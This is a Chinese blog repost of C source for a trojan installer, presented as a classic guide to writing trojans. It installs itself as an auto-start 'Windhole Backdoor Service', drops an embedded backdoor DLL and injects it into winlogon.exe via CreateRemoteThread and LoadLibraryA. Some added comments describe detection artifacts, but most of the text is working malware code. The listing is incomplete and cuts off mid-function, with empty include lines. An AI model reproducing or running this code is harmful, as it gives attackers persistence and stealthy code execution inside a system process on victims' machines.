
写木马的经典,dll插入系统进程的源码(转)

原创 IT综合 作者:RegisterForBlog 时间:2007-09-19 18:36:25
写木马的经典,dll插入系统进程的源码(转)

  代码不全,这是涉及主要的部分!有详细的注释

  里面有涉及普通常用且又重要的编程思路!

  /*---------------------------------------------------------------------

  //mysvr.c

  //Coder: sjdf

  //E-mail: sjdf1@163.com

  //Create date: 2002.8.11

  //Last modify date: 2003.10.28

  //Test platform: Win2000 Adv Server + sp4

  ---------------------------------------------------------------------*/

  //Header

  #include "bkdlldata.h"

  #include

  #include

  #include

  #include

  #include

  //---------------------------------------------------------------------

  //Global constant

  // Host artifacts this sample leaves behind. From a defender's side these
  // are the strings to hunt for: the SCM service name and display name, the
  // on-disk names of the dropped service image and DLL, and the name of the
  // process the DLL is loaded into (used by MyWorkThread).
  char SERVICENAME[9] = "windhole";

  const char DISPLAYNAME[33] = "Windhole Backdoor Service";

  const char SRVFILENAME[13] = "windhole.exe";

  const char BDRFILENAME[13] = "backdoor.dll";

  const char DESTPROC[19] = "winlogon.exe";

  //---------------------------------------------------------------------

  //Global variable

  // Service status block and the handle returned by RegisterServiceCtrlHandler;
  // both are filled in by MyServiceStart and shared with the control handler.
  SERVICE_STATUS MyServiceStatus;

  SERVICE_STATUS_HANDLE MyServiceStatusHandle;

  // Set to 1 by MyWorkThread on every one of its exit paths; the code that
  // reads it is not part of this excerpt.
  int WillStop = 0;

  //---------------------------------------------------------------------

  //Function declaration

  // Forward declarations. AddPrivilege, MyServiceCtrlHandler and ProcessToPID
  // are only declared here; their definitions are not included in this excerpt
  // (the post itself says the listing is incomplete).
  int AddPrivilege(const char *Name);

  void MyServiceStart (int argc, char *argv[]);

  void MyServiceCtrlHandler (DWORD opcode);

  DWORD MyWrokThread(void);

  DWORD ProcessToPID(const char *InputProcessName);

  //---------------------------------------------------------------------

  //Function definition

  /* Entry point of the installer / service host.

     With "-service" as argv[1] it hands control to the SCM through
     StartServiceCtrlDispatcher (MyServiceStart becomes the service main).

     Without it, it installs persistence: the running image is copied into
     the system directory as SRVFILENAME, registered with the SCM as an
     auto-start, own-process service named SERVICENAME whose command line
     carries "-service", and started right away.

     Defender view: each step is host telemetry a detection rule can key on -
     a process copying its own image into the system directory
     (GetModuleFileName + CopyFile), a SERVICE_AUTO_START service created from
     an interactive process (CreateService), and that service being started
     in the same session (StartService). Returns 1 when any step up to
     OpenSCManager fails; CreateService and StartService failures are only
     printed and main still returns 0. */

  int main(int argc,char *argv[])

  {

  //If the first argument is "-service", run as a service

  if ((argc >= 2) && (!lstrcmp(argv[1],"-service")))

  {

  SERVICE_TABLE_ENTRY DispatchTable[] =

  {

  {SERVICENAME, (LPSERVICE_MAIN_FUNCTION)MyServiceStart},

  {NULL, NULL}

  };

  if (!StartServiceCtrlDispatcher( DispatchTable))

  {

  return 1;

  }

  return 0;

  }

  //Otherwise install the service automatically

  //Copy this executable into the system directory

  char DestName[MAX_PATH + 1];

  char NowName[MAX_PATH + 1];

  ZeroMemory(DestName,MAX_PATH + 1);

  ZeroMemory(NowName,MAX_PATH + 1);

  if (!GetSystemDirectory(DestName,MAX_PATH))

  {

  printf("GetSystemDirectory() error = %d Install failure! ",GetLastError());

  return 1;

  }

  lstrcat(DestName,"");

  lstrcat(DestName,SRVFILENAME);

  if (!GetModuleFileName(NULL,NowName,MAX_PATH))

  {

  printf("GetModuleFileName() error = %d Install failure! ",GetLastError());

  return 1;

  }

  if (!CopyFile(NowName,DestName,0))

  {

  printf("CopyFile() error = %d Install failure! ",GetLastError());

  return 1;

  }

  //Install the service

  SC_HANDLE newService, scm;

  //Connect to the SCM

  if (!(scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE)))

  {

  printf("OpenSCManager() error = %d Install failure! ",GetLastError());

  return 1;

  }

  //Append the "-service" argument so the copy runs as a service when the SCM starts it

  lstrcat(DestName," -service");

  if (!(newService = CreateService(scm,

  SERVICENAME,

  DISPLAYNAME,

  SERVICE_ALL_ACCESS,

  SERVICE_WIN32_OWN_PROCESS,

  SERVICE_AUTO_START,

  SERVICE_ERROR_NORMAL,

  DestName,

  NULL, NULL, NULL, NULL, NULL)))

  {

  printf("CreateService() error = %d Install failure! ",GetLastError());

  }

  else

  {

  printf("Install success! ");

  char *pra[] = {"-service", ""};

  if (!StartService(newService,1,(const char **)pra))

  {

  printf("StartService() error = %d Start service failure! ",GetLastError());

  }

  else

  {

  printf("Start service Success! ");

  }

  }

  CloseServiceHandle(newService);

  CloseServiceHandle(scm);

  return 0;

  }

  //---------------------------------------------------------------------

  /* Service worker thread: drops the embedded DLL to disk and loads it into
     the target process.

     After a 4 s delay it writes the byte arrays data1..data5 (presumably the
     DLL image, supplied by bkdlldata.h - not visible here) to BDRFILENAME, then
     builds the DLL's expected path under the system directory. It enables
     SE_DEBUG_NAME via AddPrivilege, resolves DESTPROC to a PID, opens that
     process with thread-creation and VM read/write/operation rights, allocates
     a buffer in it, copies the path there, and requests a remote thread whose
     start address is kernel32!LoadLibraryA with that buffer as its argument -
     the textbook remote-thread DLL injection sequence.

     Defender view: the OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
     CreateRemoteThread chain against a system process, preceded by
     SeDebugPrivilege enablement and a DLL freshly written to disk, is exactly
     what EDR process-access and thread-creation telemetry is built to surface.
     WillStop is set to 1 on every exit path; returns 1 on any failure and 0
     once the remote thread has been requested (CreateRemoteThread's result is
     not examined). */

  DWORD MyWorkThread(void)

  {

  Sleep(4000);

  FILE *fp;

  if ((fp = fopen(BDRFILENAME,"wb")) == NULL)

  {

  WillStop = 1;

  return 1;

  }

  fwrite(data1,sizeof(data1),1,fp);

  fwrite(data2,sizeof(data2),1,fp);

  fwrite(data3,sizeof(data3),1,fp);

  fwrite(data4,sizeof(data4),1,fp);

  fwrite(data5,sizeof(data5),1,fp);

  fclose(fp);

  char FullName[MAX_PATH + 1];

  ZeroMemory(FullName,MAX_PATH + 1);

  GetSystemDirectory(FullName,MAX_PATH);

  lstrcat(FullName,"");

  lstrcat(FullName,BDRFILENAME);

  //Debug privilege has to be acquired first in order to open a system process

  AddPrivilege(SE_DEBUG_NAME);

  HANDLE hRemoteProcess = NULL;

  DWORD Pid = ProcessToPID(DESTPROC);

  if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //allow creating a thread in the remote process

  PROCESS_VM_OPERATION | //allow VM operations in the remote process

  PROCESS_VM_WRITE | //allow writing the remote VM

  PROCESS_VM_READ, //allow reading the remote VM

  0,

  Pid)) == NULL)

  {

  WillStop = 1;

  return 1;

  }

  char *pDllName = NULL;

  if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess,

  NULL,

  lstrlen(FullName) + 1,

  MEM_COMMIT,

  PAGE_READWRITE)) == NULL)

  {

  CloseHandle(hRemoteProcess);

  WillStop = 1;

  return 1;

  }

  //Use WriteProcessMemory to copy the DLL path name into the remote process's address space

  if (WriteProcessMemory(hRemoteProcess,

  pDllName,

  FullName,

  lstrlen(FullName),

  NULL) == 0)

  {

  VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);

  CloseHandle(hRemoteProcess);

  WillStop = 1;

  return 1;

  }

  //Resolve the entry address of LoadLibraryA

  PTHREAD_START_ROUTINE pfnStartAddr = NULL;

  if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(

  GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)

  {

  VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);

  CloseHandle(hRemoteProcess);

  WillStop = 1;

  return 1;

  }

  DWORD ThreadId = 0;

  CreateRemoteThread(hRemoteProcess, //the remote process being injected into

  NULL,

  0,

  pfnStartAddr, //entry address of LoadLibraryA

  pDllName,

  0,

  &ThreadId);

  CloseHandle(hRemoteProcess);

  WillStop = 1;

  return 0;

  }

  //---------------------------------------------------------------------

  void MyServiceStart (int argc, char *argv[])

  {

  if (!(MyServiceStatusHandle = RegisterServiceCtrlHandler(SERVICENAME,(LPHANDLER_FUNCTION)MyServiceCtrlHandler)))

  {

  return;

  }

  MyServiceStatus.dwServiceType = SERVICE_WIN32;

  MyServiceStatus.dwCurrentState = SERVICE_START_PENDING;

  MyServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;

  MyServiceStatus.dwWin32ExitCode = 0;

  MyServiceStatus.dwServiceSpecificExitCode = 0;

  MyServiceStatus.dwCheckPoint = 0;

  MyServiceStatus.dwWaitHint = 0;

  if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))

  {

  return;

  }

  DWORD Threadid;

  // Initialization code goes here. Handle error condition

  if (!CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)MyWorkThread,NULL, 0, &Threadid))

  {

  MyServiceStatus.dwCurrentState = SERVICE_STOPPED;

  MyServiceStatus.dwCheckPoint = 0;

  MyServiceStatus.dwWaitHint = 0;

  MyServiceStatus.dwWin32ExitCode = GetLastError();

  MyServiceStatus.dwServiceSpecificExitCode = GetLastError();

  

本文来自:http://www.linuxpk.com/30590.html
